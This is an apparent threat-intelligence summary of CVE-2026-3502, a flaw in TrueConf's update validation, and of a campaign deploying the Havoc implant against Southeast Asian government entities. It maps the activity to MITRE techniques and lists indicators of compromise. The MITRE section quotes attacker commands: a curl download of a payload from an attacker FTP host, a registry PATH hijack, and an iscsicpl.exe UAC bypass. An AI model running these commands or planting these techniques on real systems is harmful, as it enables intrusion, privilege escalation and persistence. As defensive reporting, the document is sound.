Check Point Research discovered a zero-day in the TrueConf client (CVE-2026-3502, CVSS 7.8) that allows an attacker controlling an on‑premises TrueConf server to distribute and execute arbitrary files to connected endpoints via the product’s update mechanism. The flaw was abused in a targeted campaign dubbed “TrueChaos” to deploy the Havoc payload against government entities in Southeast Asia. #TrueConf #Havoc
Keypoints
- Check Point Research identified CVE-2026-3502, a vulnerability in TrueConf’s updater validation that permits malicious updates to be served from a compromised on‑premises server.
- The vulnerability was exploited in-the-wild in a campaign named “TrueChaos” targeting government entities in Southeast Asia to deliver the Havoc implant.
- The attack chain used a weaponized TrueConf client update (Inno Setup) that dropped poweriso.exe and a malicious 7z-x64.dll, which was loaded via DLL side-loading.
- Post-compromise activity included reconnaissance (tasklist, tracert), downloading additional components via FTP/curl, PATH modification and UAC bypass using iscsicpl.exe, and persistence via an HKCU Run registry entry.
- Check Point links observed activity and infrastructure to Havoc C2 servers (e.g., 47.237.15[.]197) and assesses with moderate confidence the actor is Chinese-nexus.
- TrueConf released a fix in the Windows client beginning with version 8.5.3 (released March 2026); vulnerable desktop apps remained at 8.5.2 at the time of reporting.
- Hunting recommendations include looking for unsigned trueconf_windows_update.exe, presence of C:ProgramDataPowerISOpoweriso.exe, specific registry Run entries, and the trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp execution chain.
MITRE Techniques
- [T1195 ] Supply Chain Compromise – Attackers abused the product update channel of an on‑premises TrueConf server to distribute malicious updates: ‘allows an attacker who controls the on‑premises TrueConf server to distribute and execute arbitrary files across all connected endpoints.’
- [T1574.001 ] DLL Search Order Hijacking (DLL Side‑Loading) – The malicious installer dropped 7z-x64.dll and it was loaded through DLL side‑loading: ‘the package dropped a benign poweriso.exe executable and a malicious 7z-x64.dll file to the path c:programdatapoweriso, which was then loaded through DLL side-loading.’
- [T1574.002 ] Path Interception by PATH Environment Variable – The attacker modified the user %PATH% to influence DLL resolution and load a malicious iscsiexe.dll: ‘reg add “hkcuenvironment” /v path /t REG_SZ /d “C:usersappdatalocaltemp” /f … iscsicpl.exe.’
- [T1548 ] Abuse Elevation Control Mechanism – UAC bypass was performed by abusing the auto-elevated iscsicpl.exe binary to load a user-controlled DLL and achieve privilege escalation: ‘iscsicpl.exe is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit SysWOW64 version is auto-elevated and is vulnerable to DLL search-order hijacking.’
- [T1547.001 ] Registry Run Keys / Startup Folder – The actor established persistence via a user logon autorun registry value pointing to PowerISO: ‘HKCUSoftwareMicrosoftWindowsCurrentVersionRunUpdateCheck points to C:ProgramDataPowerISOPowerISO.exe.’
- [T1057 ] Process Discovery – Initial reconnaissance included enumerating running processes using tasklist: ‘tasklist > cache.’
- [T1016 ] System Network Configuration Discovery – The actor performed network route/discovery commands such as tracert: ‘tracert 8.8.8.8 -h 5.’
- [T1105 ] Ingress Tool Transfer – Additional loader and tooling were retrieved from attacker-controlled FTP/HTTP resources using curl and FTP: ‘curl -u ftpuser: ftp://47.237.15[.]197/update.7z -o c:program fileswinrarwinrar.exe x update.7z -p ‘.
- [T1071 ] Application Layer Protocol – Compromised hosts communicated with Havoc C2 infrastructure hosted on remote IPs (e.g., 47.237.15[.]197) for command-and-control: ‘47.237.15[.]197, an attacker-controlled server running Havoc C2 infrastructure.’
Indicators of Compromise
- [File name ] Malicious TrueConf update and dropped components – trueconf_windows_update.exe (malicious update), poweriso.exe (dropped executable)
- [File hash ] Confirmed malicious artifacts – 22e32bcf113326e366ac480b077067cf (trueconf_windows_update.exe), 248a4d7d4c48478dcbeade8f7dba80b3 (7z-x64.dll), and 1 more hash
- [IP address ] Havoc command-and-control infrastructure – 47.237.15[.]197 (observed C2 and FTP host), 43.134.90[.]60 (Havoc C2)
- [Registry value ] Persistence indicator – HKCUSoftwareMicrosoftWindowsCurrentVersionRunUpdateCheck pointing to C:ProgramDataPowerISOPowerISO.exe
- [File path ] Drop and install locations used in the attack – C:ProgramDataPowerISOpoweriso.exe, C:Program FilesTrueConf ServerClientInstFiles (update storage)
- [URL/FTP ] Remote delivery locations used to fetch additional tools – ftp://47.237.15[.]197/update.7z (used with curl/FTP to download update.7z)